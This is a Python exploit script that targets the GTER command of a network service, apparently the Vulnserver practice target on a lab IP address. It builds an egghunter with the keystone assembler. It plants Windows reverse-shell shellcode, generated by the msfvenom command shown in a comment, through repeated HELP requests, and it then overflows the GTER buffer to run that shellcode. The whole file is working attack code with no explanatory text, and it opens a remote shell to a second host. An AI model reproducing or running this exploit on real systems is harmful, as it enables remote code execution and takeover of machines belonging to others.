exploit_GTER.py

import socket
import sys
import struct
import hexdump
from keystone import *

host = "192.168.112.133"
port = 9999

CODE = """
check:
        mov bx,cs
        cmp bl, 0x23
        jnz egg

stub:
        xor ebx,ebx
        push ebx
        push ebx
	    push ebx
	    push ebx
        mov bl,0xc0

egg:
        or dx,0x0fff
egg1:
        inc edx
        push edx
        cmp bl, 0xc0
        je egg_64

egg_32:
        push 0x2
        pop eax
	    int 0x2e
	    pop edx

egg_end:
        cmp al,0x5
        je egg
        mov eax, 0x57303054
        mov edi,edx
        scasd
        jnz  egg1
        scasd
        jnz egg1
        jmp edi

egg_64:
        push 0x38
        pop eax
        xor ecx, ecx
        mov edx, esp
        call dword ptr fs:[ebx]
        pop ecx
        pop edx
        jmp egg_end
    """

try:
    ks = Ks(KS_ARCH_X86, KS_MODE_32)
    encoding, count = ks.asm(CODE)
    #print("%s = %s (number of statements: %u)" %(CODE, encoding, count))

    encoded_egghunter = "".join(map(lambda x: chr(x) , encoding))
    #hexdump.hexdump(encoded_egghunter)
except KsError as e:
    print("ERROR: %s" %e)

#open("egghunter.bin", "wb").write(encoded_egghunter)
#sys.exit(-1)

#pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'
buf =  "HELP T00WT00W"
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.112.134 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\0x0d" -f python -o shell.txt
buf += "\xbf\xc7\x2e\x68\x73\xda\xc1\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x52\x31\x78\x12\x03\x78\x12\x83\x2f\xd2\x8a"
buf += "\x86\x53\xc3\xc9\x69\xab\x14\xae\xe0\x4e\x25\xee\x97"
buf += "\x1b\x16\xde\xdc\x49\x9b\x95\xb1\x79\x28\xdb\x1d\x8e"
buf += "\x99\x56\x78\xa1\x1a\xca\xb8\xa0\x98\x11\xed\x02\xa0"
buf += "\xd9\xe0\x43\xe5\x04\x08\x11\xbe\x43\xbf\x85\xcb\x1e"
buf += "\x7c\x2e\x87\x8f\x04\xd3\x50\xb1\x25\x42\xea\xe8\xe5"
buf += "\x65\x3f\x81\xaf\x7d\x5c\xac\x66\xf6\x96\x5a\x79\xde"
buf += "\xe6\xa3\xd6\x1f\xc7\x51\x26\x58\xe0\x89\x5d\x90\x12"
buf += "\x37\x66\x67\x68\xe3\xe3\x73\xca\x60\x53\x5f\xea\xa5"
buf += "\x02\x14\xe0\x02\x40\x72\xe5\x95\x85\x09\x11\x1d\x28"
buf += "\xdd\x93\x65\x0f\xf9\xf8\x3e\x2e\x58\xa5\x91\x4f\xba"
buf += "\x06\x4d\xea\xb1\xab\x9a\x87\x98\xa3\x6f\xaa\x22\x34"
buf += "\xf8\xbd\x51\x06\xa7\x15\xfd\x2a\x20\xb0\xfa\x4d\x1b"
buf += "\x04\x94\xb3\xa4\x75\xbd\x77\xf0\x25\xd5\x5e\x79\xae"
buf += "\x25\x5e\xac\x61\x75\xf0\x1f\xc2\x25\xb0\xcf\xaa\x2f"
buf += "\x3f\x2f\xca\x50\x95\x58\x61\xab\x7e\xa7\xde\xc3\xf8"
buf += "\x4f\x1d\x23\x14\xcc\xa8\xc5\x7c\xfc\xfc\x5e\xe9\x65"
buf += "\xa5\x14\x88\x6a\x73\x51\x8a\xe1\x70\xa6\x45\x02\xfc"
buf += "\xb4\x32\xe2\x4b\xe6\x95\xfd\x61\x8e\x7a\x6f\xee\x4e"
buf += "\xf4\x8c\xb9\x19\x51\x62\xb0\xcf\x4f\xdd\x6a\xed\x8d"
buf += "\xbb\x55\xb5\x49\x78\x5b\x34\x1f\xc4\x7f\x26\xd9\xc5"
buf += "\x3b\x12\xb5\x93\x95\xcc\x73\x4a\x54\xa6\x2d\x21\x3e"
buf += "\x2e\xab\x09\x81\x28\xb4\x47\x77\xd4\x05\x3e\xce\xeb"
buf += "\xaa\xd6\xc6\x94\xd6\x46\x28\x4f\x53\x66\xcb\x45\xae"
buf += "\x0f\x52\x0c\x13\x52\x65\xfb\x50\x6b\xe6\x09\x29\x88"
buf += "\xf6\x78\x2c\xd4\xb0\x91\x5c\x45\x55\x95\xf3\x66\x7c"

buffer = "GTER "
buffer += "\xE4\x89\xca"
buffer += encoded_egghunter
buffer += "\x90" * (148 - len(encoded_egghunter))
buffer += struct.pack("<L", 0x625011b1)
buffer += "\x90" * (180 - len(buffer))
buffer += "\r\n"

for _ in xrange(5):
    egg = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    egg.connect((host, port))
    egg.recv(1024)
    egg.send(buf)
    egg.close()

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.recv(1024)
expl.send(buffer)
expl.close()